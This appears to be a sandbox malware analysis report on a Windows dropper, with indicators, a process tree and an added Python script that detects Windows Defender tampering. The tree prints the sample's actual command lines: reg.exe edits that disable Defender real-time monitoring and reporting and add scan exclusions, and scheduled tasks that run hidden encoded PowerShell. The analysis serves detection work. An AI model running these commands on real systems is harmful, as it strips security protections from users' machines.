Analysis
-
max time kernel
151s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system -
submitted
09-02-2023 05:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
58cb96288d8ada838c2187dc9bd21fae
-
SHA1
56da68afe24c9d93ed7f0153c6550e5a357c0ba6
-
SHA256
a02fc41c21e5cf0aa8919198cb3dc7e93bbbf7fb0b6ae8bc4c97332818b0dde1
-
SHA512
010c64a79c90aefdbd1190e2b032cb601f588cb384ad6246c5dc454ed888225dd2792e7a6ab90cbadec286e340b98635a230e6a9230b92479981514ab022dbdf
-
SSDEEP
196608:91O8S2nXipTV2dErfoR7lfYhhKesL/QOtP7uvBr+jFq7F:3O5Yifm7lfWhKesL/QYDArQq7F
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings
Processes: reg.exe, reg.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
-
Windows security bypass
Processes: reg.exe (×4), conhost.exe, reg.exe (×6), conhost.exe, reg.exe (×3), conhost.exe, reg.exe (×2)
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" | conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" | conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" | conhost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | conhost.exe
-
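The two signatures above are built entirely from reg.exe writes to the Windows Defender keys: exclusion entries under both the live key (SOFTWARE\Microsoft\Windows Defender\Exclusions) and the policy key (SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions), plus DisableRealtimeMonitoring = 1 and SpyNetReporting = 0. The Python below is an added example and not part of the sandbox report or the sample: it parses reg.exe ADD command lines (the quoted key, /v, /t, /d and the /reg:32 or /reg:64 view switch) and classifies each one. The sample lines are copied from the process tree of this report, except for the last line, which is a constructed benign control; the category names, the hive aliases and the Wow6432Node handling are this example's own choices.

```python
"""Classify reg.exe command lines for Windows Defender tampering.

Added example; it is not part of the sandbox report. The sample command lines
are copied from the report's process tree (plus one constructed benign line);
the category names and matching rules are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Copied from the process tree above, one reg.exe invocation each.
# The last line is a constructed benign control that must not be flagged.
SAMPLE_CMDLINES = [
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64',
    r'REG ADD "HKCU\Software\ExampleVendor\ExampleApp" /f /v "InstallDir" /t REG_SZ /d "C:\Program Files\ExampleApp"',
]

# "REG ADD <key>" or '"C:\...\reg.exe" ADD <key>'; the key may be quoted.
REG_ADD_RE = re.compile(
    r'^\s*(?:"[^"]*\breg(?:\.exe)?"|\S*\breg(?:\.exe)?)\s+add\s+(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))',
    re.IGNORECASE,
)
# /v, /t and /d take one argument; /f and /reg:NN do not.
OPT_RE = re.compile(r'/(?P<opt>[vtd])\b\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.IGNORECASE)
VIEW_RE = re.compile(r'/reg:(?P<view>32|64)', re.IGNORECASE)

HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
DEFENDER_ROOTS = (
    "hklm\\software\\microsoft\\windows defender\\",            # live configuration
    "hklm\\software\\policies\\microsoft\\windows defender\\",  # policy overrides
)


@dataclass
class RegAdd:
    key: str
    value: Optional[str]
    data: Optional[str]
    reg_type: Optional[str]
    view: Optional[str]  # "32", "64" or None (default view of the calling process)


def parse_reg_add(cmdline: str) -> Optional[RegAdd]:
    """Parse a single reg.exe ADD command line; None if it is not one."""
    m = REG_ADD_RE.match(cmdline)
    if not m:
        return None
    opts = {}
    for o in OPT_RE.finditer(cmdline, m.end()):
        opts[o.group("opt").lower()] = o.group("q") if o.group("q") is not None else o.group("u")
    view = VIEW_RE.search(cmdline)
    return RegAdd(
        key=m.group("qkey") or m.group("key"),
        value=opts.get("v"),
        data=opts.get("d"),
        reg_type=opts.get("t"),
        view=view.group("view") if view else None,
    )


def normalize_key(key: str) -> str:
    """Lower-case, expand hive aliases and drop the Wow6432Node redirection."""
    hive, _, rest = key.partition("\\")
    hive = HIVE_ALIASES.get(hive.lower(), hive.lower())
    return hive + "\\" + rest.lower().replace("wow6432node\\", "")


def classify(cmd: RegAdd) -> Optional[str]:
    """Category of Defender tampering, or None when the key is unrelated."""
    key = normalize_key(cmd.key) + "\\"  # trailing separator makes the prefix test exact
    root = next((r for r in DEFENDER_ROOTS if key.startswith(r)), None)
    if root is None:
        return None
    sub = key[len(root):].rstrip("\\")
    value = (cmd.value or "").lower()
    if sub.startswith("exclusions\\"):
        return "defender_exclusion_added"  # Paths, Extensions or Processes
    if sub == "real-time protection" and value == "disablerealtimemonitoring" and cmd.data == "1":
        return "defender_realtime_disabled"
    if sub == "spynet" and value == "spynetreporting" and cmd.data == "0":
        return "defender_cloud_reporting_disabled"
    return "defender_key_modified"  # anything else under the Defender keys


def scan(cmdlines: List[str]) -> List[tuple]:
    """(category, view, key, value) for every Defender-tampering REG ADD."""
    findings = []
    for line in cmdlines:
        cmd = parse_reg_add(line)
        category = classify(cmd) if cmd else None
        if category:
            findings.append((category, cmd.view, cmd.key, cmd.value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

Two details of this report are worth keeping in a detector: the installer writes every exclusion twice, once per registry view (/reg:32 and /reg:64), and it writes both the live Exclusions key and the policy key, so a check that reads only one view or only one of the two trees sees half of the tampering.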
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Install.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
-
Executes dropped EXE 3 IoCs
Processes: Install.exe, Install.exe, bpisjHu.exe
pid | process
2020 | Install.exe
612 | Install.exe
1816 | bpisjHu.exe
-
Loads dropped DLL 8 IoCs
Processes: file.exe, Install.exe, Install.exe
pid | process
1896 | file.exe
2020 | Install.exe
2020 | Install.exe
2020 | Install.exe
2020 | Install.exe
612 | Install.exe
612 | Install.exe
612 | Install.exe
-
Drops file in System32 directory 7 IoCs
Processes: powershell.EXE, bpisjHu.exe, powershell.EXE, Install.exe, powershell.EXE
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | bpisjHu.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | bpisjHu.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | bpisjHu.exe
-
Drops file in Windows directory 1 IoCs
Processes: schtasks.exe
description | ioc | process
File created | C:\Windows\Tasks\bsXFoBxfaHoLLxRHnd.job | schtasks.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (×5)
pid | process
1680 | schtasks.exe
912 | schtasks.exe
684 | schtasks.exe
912 | schtasks.exe
1432 | schtasks.exe
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes: Install.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
-
Modifies data under HKEY_USERS 9 IoCs
Processes: wscript.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: powershell.EXE, powershell.EXE, powershell.EXE
pid | process
564 | powershell.EXE
564 | powershell.EXE
564 | powershell.EXE
2016 | powershell.EXE
2016 | powershell.EXE
2016 | powershell.EXE
832 | powershell.EXE
832 | powershell.EXE
832 | powershell.EXE
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.EXE, powershell.EXE, powershell.EXE
description | pid | process
Token: SeDebugPrivilege | 564 | powershell.EXE
Token: SeDebugPrivilege | 2016 | powershell.EXE
Token: SeDebugPrivilege | 832 | powershell.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: file.exe, Install.exe, Install.exe, forfiles.exe, cmd.exe, forfiles.exe, cmd.exe
pid process -> target pid target process | events
1896 file.exe -> 2020 Install.exe | 7
2020 Install.exe -> 612 Install.exe | 7
612 Install.exe -> 996 forfiles.exe | 7
612 Install.exe -> 684 forfiles.exe | 7
996 forfiles.exe -> 1260 cmd.exe | 7
1260 cmd.exe -> 1620 reg.exe | 7
684 forfiles.exe -> 1152 cmd.exe | 7
1260 cmd.exe -> 1732 reg.exe | 7
1152 cmd.exe -> 1728 reg.exe | 7
1152 cmd.exe -> 1812 reg.exe | 1
Processes (tree; [n] is the depth of the process, "cmd:" the command line the report recorded)
-
[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
      cmd: .\Install.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
        cmd: .\Install.exe /S /site_id "525403"
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        - Enumerates system info in registry
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\forfiles.exe
          cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
          [6] \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
      [4] C:\Windows\SysWOW64\forfiles.exe
          cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
          [6] \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /CREATE /TN "gFHhEAAbA" /SC once /ST 04:40:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          - Creates scheduled task(s)
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /run /I /tn "gFHhEAAbA"
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /DELETE /F /TN "gFHhEAAbA"
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /CREATE /TN "bsXFoBxfaHoLLxRHnd" /SC once /ST 06:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe\" Y9 /site_id 525403 /S" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)
[1] C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {C891A8B2-5A95-4BC7-AE78-347E883BE935} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
[1] C:\Windows\system32\gpscript.exe
    cmd: gpscript.exe /RefreshSystemParam
[1] C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {B1E91904-F896-4FDE-992A-C35EE5D6E9A8} S-1-5-18:NT AUTHORITY\System:Service:
  [2] C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe Y9 /site_id 525403 /S
      - Executes dropped EXE
      - Drops file in System32 directory
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /CREATE /TN "gcOVckcwJ" /SC once /ST 03:36:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /run /I /tn "gcOVckcwJ"
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /DELETE /F /TN "gcOVckcwJ"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          - Modifies Windows Defender Real-time Protection settings
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /CREATE /TN "gHGRxwhdY" /SC once /ST 02:54:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /run /I /tn "gHGRxwhdY"
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /DELETE /F /TN "gHGRxwhdY"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C copy nul "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"
    [3] C:\Windows\SysWOW64\wscript.exe
        cmd: wscript "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"
        - Modifies data under HKEY_USERS
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:32
